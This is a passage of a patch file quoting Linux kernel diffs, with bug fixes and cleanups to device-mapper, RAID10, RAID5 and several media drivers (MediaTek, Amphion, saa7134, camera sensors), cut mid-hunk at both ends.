++			else if (arg_name && !strcasecmp(arg_name, "r"))
+ 				fc->corrupt_bio_rw = READ;
+ 			else {
+ 				ti->error = "Invalid corrupt bio direction (r or w)";
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 53f9f765df9fd..a2b8f8781a99f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4646,11 +4646,13 @@ static int __init dm_integrity_init(void)
+ 	}
+ 
+ 	r = dm_register_target(&integrity_target);
+-
+-	if (r < 0)
++	if (r < 0) {
+ 		DMERR("register failed %d", r);
++		kmem_cache_destroy(journal_io_cache);
++		return r;
++	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static void __exit dm_integrity_exit(void)
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 41d55218b0764..83aecd9250ba6 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,10 +1151,13 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
++		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		if (param->flags & DM_SKIP_LOCKFS_FLAG)
++		old_map = dm_get_live_table(md, &srcu_idx);
++		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+@@ -1539,11 +1542,12 @@ static int table_clear(struct file *filp, struct dm_ioctl *param, size_t param_s
+ 		has_new_map = true;
+ 	}
+ 
+-	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
+-
+-	__dev_status(hc->md, param);
+ 	md = hc->md;
+ 	up_write(&_hash_lock);
++
++	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
++	__dev_status(md, param);
++
+ 	if (old_map) {
+ 		dm_sync_table(md);
+ 		dm_table_destroy(old_map);
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 32b2d3b99d786..3acded2f976db 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -1203,21 +1203,12 @@ struct dm_crypto_profile {
+ 	struct mapped_device *md;
+ };
+ 
+-struct dm_keyslot_evict_args {
+-	const struct blk_crypto_key *key;
+-	int err;
+-};
+-
+ static int dm_keyslot_evict_callback(struct dm_target *ti, struct dm_dev *dev,
+ 				     sector_t start, sector_t len, void *data)
+ {
+-	struct dm_keyslot_evict_args *args = data;
+-	int err;
++	const struct blk_crypto_key *key = data;
+ 
+-	err = blk_crypto_evict_key(bdev_get_queue(dev->bdev), args->key);
+-	if (!args->err)
+-		args->err = err;
+-	/* Always try to evict the key from all devices. */
++	blk_crypto_evict_key(dev->bdev, key);
+ 	return 0;
+ }
+ 
+@@ -1230,7 +1221,6 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ {
+ 	struct mapped_device *md =
+ 		container_of(profile, struct dm_crypto_profile, profile)->md;
+-	struct dm_keyslot_evict_args args = { key };
+ 	struct dm_table *t;
+ 	int srcu_idx;
+ 
+@@ -1243,11 +1233,12 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ 
+ 		if (!ti->type->iterate_devices)
+ 			continue;
+-		ti->type->iterate_devices(ti, dm_keyslot_evict_callback, &args);
++		ti->type->iterate_devices(ti, dm_keyslot_evict_callback,
++					  (void *)key);
+ 	}
+ 
+ 	dm_put_live_table(md, srcu_idx);
+-	return args.err;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 64e8ac429984d..14a9988ec30ba 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -523,7 +523,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		sector_t cur_block = io->block + b;
+ 		struct ahash_request *req = verity_io_hash_req(v, io);
+ 
+-		if (v->validated_blocks &&
++		if (v->validated_blocks && bio->bi_status == BLK_STS_OK &&
+ 		    likely(test_bit(cur_block, v->validated_blocks))) {
+ 			verity_bv_skip_block(v, io, iter);
+ 			continue;
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 9a6503f5cb982..67398394cc9c9 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -995,11 +995,15 @@ static bool stop_waiting_barrier(struct r10conf *conf)
+ 	    (!bio_list_empty(&bio_list[0]) || !bio_list_empty(&bio_list[1])))
+ 		return true;
+ 
+-	/* move on if recovery thread is blocked by us */
+-	if (conf->mddev->thread->tsk == current &&
+-	    test_bit(MD_RECOVERY_RUNNING, &conf->mddev->recovery) &&
+-	    conf->nr_queued > 0)
++	/*
++	 * move on if io is issued from raid10d(), nr_pending is not released
++	 * from original io(see handle_read_error()). All raise barrier is
++	 * blocked until this io is done.
++	 */
++	if (conf->mddev->thread->tsk == current) {
++		WARN_ON_ONCE(atomic_read(&conf->nr_pending) == 0);
+ 		return true;
++	}
+ 
+ 	return false;
+ }
+@@ -1244,7 +1248,8 @@ static void raid10_read_request(struct mddev *mddev, struct bio *bio,
+ 	}
+ 	slot = r10_bio->read_slot;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (!r10_bio->start_time &&
++	    blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
+ 		r10_bio->start_time = bio_start_io_acct(bio);
+ 	read_bio = bio_alloc_clone(rdev->bdev, bio, gfp, &mddev->bio_set);
+ 
+@@ -1574,6 +1579,7 @@ static void __make_request(struct mddev *mddev, struct bio *bio, int sectors)
+ 	r10_bio->sector = bio->bi_iter.bi_sector;
+ 	r10_bio->state = 0;
+ 	r10_bio->read_slot = -1;
++	r10_bio->start_time = 0;
+ 	memset(r10_bio->devs, 0, sizeof(r10_bio->devs[0]) *
+ 			conf->geo.raid_disks);
+ 
+@@ -2609,11 +2615,22 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	struct r10conf *conf = mddev->private;
+ 	int d;
+-	struct bio *wbio, *wbio2;
++	struct bio *wbio = r10_bio->devs[1].bio;
++	struct bio *wbio2 = r10_bio->devs[1].repl_bio;
++
++	/* Need to test wbio2->bi_end_io before we call
++	 * submit_bio_noacct as if the former is NULL,
++	 * the latter is free to free wbio2.
++	 */
++	if (wbio2 && !wbio2->bi_end_io)
++		wbio2 = NULL;
+ 
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state)) {
+ 		fix_recovery_read_error(r10_bio);
+-		end_sync_request(r10_bio);
++		if (wbio->bi_end_io)
++			end_sync_request(r10_bio);
++		if (wbio2)
++			end_sync_request(r10_bio);
+ 		return;
+ 	}
+ 
+@@ -2622,14 +2639,6 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ 	 * and submit the write request
+ 	 */
+ 	d = r10_bio->devs[1].devnum;
+-	wbio = r10_bio->devs[1].bio;
+-	wbio2 = r10_bio->devs[1].repl_bio;
+-	/* Need to test wbio2->bi_end_io before we call
+-	 * submit_bio_noacct as if the former is NULL,
+-	 * the latter is free to free wbio2.
+-	 */
+-	if (wbio2 && !wbio2->bi_end_io)
+-		wbio2 = NULL;
+ 	if (wbio->bi_end_io) {
+ 		atomic_inc(&conf->mirrors[d].rdev->nr_pending);
+ 		md_sync_acct(conf->mirrors[d].rdev->bdev, bio_sectors(wbio));
+@@ -2978,9 +2987,13 @@ static void handle_read_error(struct mddev *mddev, struct r10bio *r10_bio)
+ 		md_error(mddev, rdev);
+ 
+ 	rdev_dec_pending(rdev, mddev);
+-	allow_barrier(conf);
+ 	r10_bio->state = 0;
+ 	raid10_read_request(mddev, r10_bio->master_bio, r10_bio);
++	/*
++	 * allow_barrier after re-submit to ensure no sync io
++	 * can be issued while regular io pending.
++	 */
++	allow_barrier(conf);
+ }
+ 
+ static void handle_write_completed(struct r10conf *conf, struct r10bio *r10_bio)
+@@ -3289,10 +3302,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 	sector_t chunk_mask = conf->geo.chunk_mask;
+ 	int page_idx = 0;
+ 
+-	if (!mempool_initialized(&conf->r10buf_pool))
+-		if (init_resync(conf))
+-			return 0;
+-
+ 	/*
+ 	 * Allow skipping a full rebuild for incremental assembly
+ 	 * of a clean array, like RAID1 does.
+@@ -3308,6 +3317,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 		return mddev->dev_sectors - sector_nr;
+ 	}
+ 
++	if (!mempool_initialized(&conf->r10buf_pool))
++		if (init_resync(conf))
++			return 0;
++
+  skipped:
+ 	max_sector = mddev->dev_sectors;
+ 	if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery) ||
+@@ -4004,6 +4017,20 @@ static int setup_geo(struct geom *geo, struct mddev *mddev, enum geo_type new)
+ 	return nc*fc;
+ }
+ 
++static void raid10_free_conf(struct r10conf *conf)
++{
++	if (!conf)
++		return;
++
++	mempool_exit(&conf->r10bio_pool);
++	kfree(conf->mirrors);
++	kfree(conf->mirrors_old);
++	kfree(conf->mirrors_new);
++	safe_put_page(conf->tmppage);
++	bioset_exit(&conf->bio_split);
++	kfree(conf);
++}
++
+ static struct r10conf *setup_conf(struct mddev *mddev)
+ {
+ 	struct r10conf *conf = NULL;
+@@ -4086,13 +4113,7 @@ static struct r10conf *setup_conf(struct mddev *mddev)
+ 	return conf;
+ 
+  out:
+-	if (conf) {
+-		mempool_exit(&conf->r10bio_pool);
+-		kfree(conf->mirrors);
+-		safe_put_page(conf->tmppage);
+-		bioset_exit(&conf->bio_split);
+-		kfree(conf);
+-	}
++	raid10_free_conf(conf);
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -4129,6 +4150,9 @@ static int raid10_run(struct mddev *mddev)
+ 	if (!conf)
+ 		goto out;
+ 
++	mddev->thread = conf->thread;
++	conf->thread = NULL;
++
+ 	if (mddev_is_clustered(conf->mddev)) {
+ 		int fc, fo;
+ 
+@@ -4141,9 +4165,6 @@ static int raid10_run(struct mddev *mddev)
+ 		}
+ 	}
+ 
+-	mddev->thread = conf->thread;
+-	conf->thread = NULL;
+-
+ 	if (mddev->queue) {
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+@@ -4283,10 +4304,7 @@ static int raid10_run(struct mddev *mddev)
+ 
+ out_free_conf:
+ 	md_unregister_thread(&mddev->thread);
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf);
++	raid10_free_conf(conf);
+ 	mddev->private = NULL;
+ out:
+ 	return -EIO;
+@@ -4294,15 +4312,7 @@ out:
+ 
+ static void raid10_free(struct mddev *mddev, void *priv)
+ {
+-	struct r10conf *conf = priv;
+-
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf->mirrors_old);
+-	kfree(conf->mirrors_new);
+-	bioset_exit(&conf->bio_split);
+-	kfree(conf);
++	raid10_free_conf(priv);
+ }
+ 
+ static void raid10_quiesce(struct mddev *mddev, int quiesce)
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 7b820b81d8c2b..f787c9e5b10e7 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6079,6 +6079,38 @@ out_release:
+ 	return ret;
+ }
+ 
++/*
++ * If the bio covers multiple data disks, find sector within the bio that has
++ * the lowest chunk offset in the first chunk.
++ */
++static sector_t raid5_bio_lowest_chunk_sector(struct r5conf *conf,
++					      struct bio *bi)
++{
++	int sectors_per_chunk = conf->chunk_sectors;
++	int raid_disks = conf->raid_disks;
++	int dd_idx;
++	struct stripe_head sh;
++	unsigned int chunk_offset;
++	sector_t r_sector = bi->bi_iter.bi_sector & ~((sector_t)RAID5_STRIPE_SECTORS(conf)-1);
++	sector_t sector;
++
++	/* We pass in fake stripe_head to get back parity disk numbers */
++	sector = raid5_compute_sector(conf, r_sector, 0, &dd_idx, &sh);
++	chunk_offset = sector_div(sector, sectors_per_chunk);
++	if (sectors_per_chunk - chunk_offset >= bio_sectors(bi))
++		return r_sector;
++	/*
++	 * Bio crosses to the next data disk. Check whether it's in the same
++	 * chunk.
++	 */
++	dd_idx++;
++	while (dd_idx == sh.pd_idx || dd_idx == sh.qd_idx)
++		dd_idx++;
++	if (dd_idx >= raid_disks)
++		return r_sector;
++	return r_sector + sectors_per_chunk - chunk_offset;
++}
++
+ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -6150,6 +6182,17 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 	}
+ 	md_account_bio(mddev, &bi);
+ 
++	/*
++	 * Lets start with the stripe with the lowest chunk offset in the first
++	 * chunk. That has the best chances of creating IOs adjacent to
++	 * previous IOs in case of sequential IO and thus creates the most
++	 * sequential IO pattern. We don't bother with the optimization when
++	 * reshaping as the performance benefit is not worth the complexity.
++	 */
++	if (likely(conf->reshape_progress == MaxSector))
++		logical_sector = raid5_bio_lowest_chunk_sector(conf, bi);
++	s = (logical_sector - ctx.first_sector) >> RAID5_STRIPE_SHIFT(conf);
++
+ 	add_wait_queue(&conf->wait_for_overlap, &wait);
+ 	while (1) {
+ 		res = make_stripe_request(mddev, conf, &ctx, logical_sector,
+@@ -6178,7 +6221,7 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 			continue;
+ 		}
+ 
+-		s = find_first_bit(ctx.sectors_to_do, stripe_cnt);
++		s = find_next_bit_wrap(ctx.sectors_to_do, stripe_cnt, s);
+ 		if (s == stripe_cnt)
+ 			break;
+ 
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 7c61873b71981..306dc35e925fd 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1472,21 +1472,26 @@ static int hi846_init_controls(struct hi846 *hi846)
+ 	if (ctrl_hdlr->error) {
+ 		dev_err(&client->dev, "v4l ctrl handler error: %d\n",
+ 			ctrl_hdlr->error);
+-		return ctrl_hdlr->error;
++		ret = ctrl_hdlr->error;
++		goto error;
+ 	}
+ 
+ 	ret = v4l2_fwnode_device_parse(&client->dev, &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	ret = v4l2_ctrl_new_fwnode_properties(ctrl_hdlr, &hi846_ctrl_ops,
+ 					      &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hi846->sd.ctrl_handler = ctrl_hdlr;
+ 
+ 	return 0;
++
++error:
++	v4l2_ctrl_handler_free(ctrl_hdlr);
++	return ret;
+ }
+ 
+ static int hi846_set_video_mode(struct hi846 *hi846, int fps)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index d034a67042e35..892cd97b7cab7 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -941,6 +941,7 @@ err_async:
+ static void max9286_v4l2_unregister(struct max9286_priv *priv)
+ {
+ 	fwnode_handle_put(priv->sd.fwnode);
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	v4l2_async_unregister_subdev(&priv->sd);
+ 	max9286_v4l2_notifier_unregister(priv);
+ }
+diff --git a/drivers/media/i2c/ov8856.c b/drivers/media/i2c/ov8856.c
+index efa18d026ac33..aaf42ece0a11f 100644
+--- a/drivers/media/i2c/ov8856.c
++++ b/drivers/media/i2c/ov8856.c
+@@ -1709,46 +1709,6 @@ static int ov8856_identify_module(struct ov8856 *ov8856)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STREAMING);
+-	if (ret)
+-		return ret;
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_MODE_CTRL,
+-			       OV8856_REG_VALUE_08BIT, OV8856_OTP_MODE_AUTO);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to set otp mode");
+-		return ret;
+-	}
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_LOAD_CTRL,
+-			       OV8856_REG_VALUE_08BIT,
+-			       OV8856_OTP_LOAD_CTRL_ENABLE);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to enable load control");
+-		return ret;
+-	}
+-
+-	ret = ov8856_read_reg(ov8856, OV8856_MODULE_REVISION,
+-			      OV8856_REG_VALUE_08BIT, &val);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to read module revision");
+-		return ret;
+-	}
+-
+-	dev_info(&client->dev, "OV8856 revision %x (%s) at address 0x%02x\n",
+-		 val,
+-		 val == OV8856_2A_MODULE ? "2A" :
+-		 val == OV8856_1B_MODULE ? "1B" : "unknown revision",
+-		 client->addr);
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STANDBY);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to exit streaming mode");
+-		return ret;
+-	}
+-
+ 	ov8856->identified = true;
+ 
+ 	return 0;
+diff --git a/drivers/media/pci/dm1105/dm1105.c b/drivers/media/pci/dm1105/dm1105.c
+index 4ac645a56c14e..9e9c7c071accc 100644
+--- a/drivers/media/pci/dm1105/dm1105.c
++++ b/drivers/media/pci/dm1105/dm1105.c
+@@ -1176,6 +1176,7 @@ static void dm1105_remove(struct pci_dev *pdev)
+ 	struct dvb_demux *dvbdemux = &dev->demux;
+ 	struct dmx_demux *dmx = &dvbdemux->dmx;
+ 
++	cancel_work_sync(&dev->ir.work);
+ 	dm1105_ir_exit(dev);
+ 	dmx->close(dmx);
+ 	dvb_net_release(&dev->dvbnet);
+diff --git a/drivers/media/pci/saa7134/saa7134-ts.c b/drivers/media/pci/saa7134/saa7134-ts.c
+index 6a5053126237f..437dbe5e75e29 100644
+--- a/drivers/media/pci/saa7134/saa7134-ts.c
++++ b/drivers/media/pci/saa7134/saa7134-ts.c
+@@ -300,6 +300,7 @@ int saa7134_ts_start(struct saa7134_dev *dev)
+ 
+ int saa7134_ts_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->ts_q.timeout);
+ 	saa7134_pgtable_free(dev->pci, &dev->ts_q.pt);
+ 	return 0;
+ }
+diff --git a/drivers/media/pci/saa7134/saa7134-vbi.c b/drivers/media/pci/saa7134/saa7134-vbi.c
+index 3f0b0933eed69..3e773690468bd 100644
+--- a/drivers/media/pci/saa7134/saa7134-vbi.c
++++ b/drivers/media/pci/saa7134/saa7134-vbi.c
+@@ -185,6 +185,7 @@ int saa7134_vbi_init1(struct saa7134_dev *dev)
+ int saa7134_vbi_fini(struct saa7134_dev *dev)
+ {
+ 	/* nothing */
++	del_timer_sync(&dev->vbi_q.timeout);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/pci/saa7134/saa7134-video.c b/drivers/media/pci/saa7134/saa7134-video.c
+index 4d8974c9fcc98..29124756a62bc 100644
+--- a/drivers/media/pci/saa7134/saa7134-video.c
++++ b/drivers/media/pci/saa7134/saa7134-video.c
+@@ -2146,6 +2146,7 @@ int saa7134_video_init1(struct saa7134_dev *dev)
+ 
+ void saa7134_video_fini(struct saa7134_dev *dev)
+ {
++	del_timer_sync(&dev->video_q.timeout);
+ 	/* free stuff */
+ 	saa7134_pgtable_free(dev->pci, &dev->video_q.pt);
+ 	saa7134_pgtable_free(dev->pci, &dev->vbi_q.pt);
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index b27e6bed85f0f..4918547793dc1 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -139,7 +139,31 @@ static const struct vpu_format vdec_formats[] = {
+ 	{0, 0, 0, 0},
+ };
+ 
++static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
++{
++	struct vpu_inst *inst = ctrl_to_inst(ctrl);
++	struct vdec_t *vdec = inst->priv;
++	int ret = 0;
++
++	vpu_inst_lock(inst);
++	switch (ctrl->id) {
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
++		vdec->params.display_delay_enable = ctrl->val;
++		break;
++	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY:
++		vdec->params.display_delay = ctrl->val;
++		break;
++	default:
++		ret = -EINVAL;
++		break;
++	}
++	vpu_inst_unlock(inst);
++
++	return ret;
++}
++
+ static const struct v4l2_ctrl_ops vdec_ctrl_ops = {
++	.s_ctrl = vdec_op_s_ctrl,
+ 	.g_volatile_ctrl = vpu_helper_g_volatile_ctrl,
+ };
+ 
+@@ -152,6 +176,14 @@ static int vdec_ctrl_init(struct vpu_inst *inst)
+ 	if (ret)
+ 		return ret;
+ 
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY,
++			  0, 0, 1, 0);
++
++	v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
++			  V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE,
++			  0, 1, 1, 0);
++
+ 	ctrl = v4l2_ctrl_new_std(&inst->ctrl_handler, &vdec_ctrl_ops,
+ 				 V4L2_CID_MIN_BUFFERS_FOR_CAPTURE, 1, 32, 1, 2);
+ 	if (ctrl)
+diff --git a/drivers/media/platform/amphion/vpu_codec.h b/drivers/media/platform/amphion/vpu_codec.h
+index 528a93f08ecd4..bac6d0d94f8a5 100644
+--- a/drivers/media/platform/amphion/vpu_codec.h
++++ b/drivers/media/platform/amphion/vpu_codec.h
+@@ -55,7 +55,8 @@ struct vpu_encode_params {
+ struct vpu_decode_params {
+ 	u32 codec_format;
+ 	u32 output_format;
+-	u32 b_dis_reorder;
++	u32 display_delay_enable;
++	u32 display_delay;
+ 	u32 b_non_frame;
+ 	u32 frame_count;
+ 	u32 end_flag;
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 9f2890730fd70..ae094cdc9bfc8 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -640,7 +640,9 @@ static int vpu_malone_set_params(struct vpu_shared_addr *shared,
+ 		hc->jpg[instance].jpg_mjpeg_interlaced = 0;
+ 	}
+ 
+-	hc->codec_param[instance].disp_imm = params->b_dis_reorder ? 1 : 0;
++	hc->codec_param[instance].disp_imm = params->display_delay_enable ? 1 : 0;
++	if (malone_format != MALONE_FMT_AVC)
++		hc->codec_param[instance].disp_imm = 0;
+ 	hc->codec_param[instance].dbglog_enable = 0;
+ 	iface->dbglog_desc.level = 0;
+ 
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+index 5f74ea3b7a524..8612a48bde10f 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-m2m.c
+@@ -566,7 +566,11 @@ static int mdp_m2m_open(struct file *file)
+ 		goto err_free_ctx;
+ 	}
+ 
+-	ctx->id = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	ret = ida_alloc(&mdp->mdp_ida, GFP_KERNEL);
++	if (ret < 0)
++		goto err_unlock_mutex;
++	ctx->id = ret;
++
+ 	ctx->mdp_dev = mdp;
+ 
+ 	v4l2_fh_init(&ctx->fh, vdev);
+@@ -617,6 +621,8 @@ err_release_handler:
+ 	v4l2_fh_del(&ctx->fh);
+ err_exit_fh:
+ 	v4l2_fh_exit(&ctx->fh);
++	ida_free(&mdp->mdp_ida, ctx->id);
++err_unlock_mutex:
+ 	mutex_unlock(&mdp->m2m_lock);
+ err_free_ctx:
+ 	kfree(ctx);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+index 4e84a37ecdfc1..36336d169bd91 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-regs.c
+@@ -4,6 +4,7 @@
+  * Author: Ping-Hsun Wu <ping-hsun.wu@mediatek.com>
+  */
+ 
++#include <linux/math64.h>
+ #include <media/v4l2-common.h>
+ #include <media/videobuf2-v4l2.h>
+ #include <media/videobuf2-dma-contig.h>
+@@ -428,14 +429,15 @@ const struct mdp_format *mdp_try_fmt_mplane(struct v4l2_format *f,
+ 		u32 bpl = pix_mp->plane_fmt[i].bytesperline;
+ 		u32 min_si, max_si;
+ 		u32 si = pix_mp->plane_fmt[i].sizeimage;
++		u64 di;
+ 
+ 		bpl = clamp(bpl, min_bpl, max_bpl);
+ 		pix_mp->plane_fmt[i].bytesperline = bpl;
+ 
+-		min_si = (bpl * pix_mp->height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
+-		max_si = (bpl * s.max_height * fmt->depth[i]) /
+-			 fmt->row_depth[i];
++		di = (u64)bpl * pix_mp->height * fmt->depth[i];
++		min_si = (u32)div_u64(di, fmt->row_depth[i]);
++		di = (u64)bpl * s.max_height * fmt->depth[i];
++		max_si = (u32)div_u64(di, fmt->row_depth[i]);
+ 
+ 		si = clamp(si, min_si, max_si);
+ 		pix_mp->plane_fmt[i].sizeimage = si;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index 641f533c417fd..c99705681a03e 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -39,10 +39,9 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ {
+ 	const struct mtk_vcodec_dec_pdata *dec_pdata = ctx->dev->vdec_pdata;
+ 	const struct mtk_video_fmt *fmt;
+-	struct mtk_q_data *q_data;
+ 	int num_frame_count = 0, i;
+-	bool ret = true;
+ 
++	fmt = &dec_pdata->vdec_formats[format_index];
+ 	for (i = 0; i < *dec_pdata->num_formats; i++) {
+ 		if (dec_pdata->vdec_formats[i].type != MTK_FMT_FRAME)
+ 			continue;
+@@ -50,27 +49,10 @@ static bool mtk_vdec_get_cap_fmt(struct mtk_vcodec_ctx *ctx, int format_index)
+ 		num_frame_count++;
+ 	}
+ 
+-	if (num_frame_count == 1)
++	if (num_frame_count == 1 || fmt->fourcc == V4L2_PIX_FMT_MM21)
+ 		return true;
+ 
+-	fmt = &dec_pdata->vdec_formats[format_index];
+-	q_data = &ctx->q_data[MTK_Q_DATA_SRC];
+-	switch (q_data->fmt->fourcc) {
+-	case V4L2_PIX_FMT_VP8_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = true;
+-		break;
+-	case V4L2_PIX_FMT_H264_SLICE:
+-	case V4L2_PIX_FMT_VP9_FRAME:
+-		if (fmt->fourcc == V4L2_PIX_FMT_MM21)
+-			ret = false;
+-		break;
+-	default:
+-		ret = true;
+-		break;
+-	}
+-
+-	return ret;
++	return false;
+ }
+ 
+ static struct mtk_q_data *mtk_vdec_get_q_data(struct mtk_vcodec_ctx *ctx,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+index 174a6eec2f549..42df901e8beb4 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_drv.c
+@@ -451,7 +451,8 @@ err_core_workq:
+ 	if (IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch))
+ 		destroy_workqueue(dev->core_workqueue);
+ err_res:
+-	pm_runtime_disable(dev->pm.dev);
++	if (!dev->vdec_pdata->is_subdev_supported)
++		pm_runtime_disable(dev->pm.dev);
+ err_dec_pm:
+ 	mtk_vcodec_fw_release(dev->fw_handler);
+ 	return ret;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+index 376db0e433d75..b753bf54ebd90 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+@@ -193,8 +193,16 @@ err:
+ 	return ret;
+ }
+ 
++static int mtk_vdec_hw_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
++
++	return 0;
++}
++
+ static struct platform_driver mtk_vdec_driver = {
+ 	.probe	= mtk_vdec_hw_probe,
++	.remove = mtk_vdec_hw_remove,
+ 	.driver	= {
+ 		.name	= "mtk-vdec-comp",
+ 		.of_match_table = mtk_vdec_hw_match,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 035c86e7809fd..29991551cf614 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
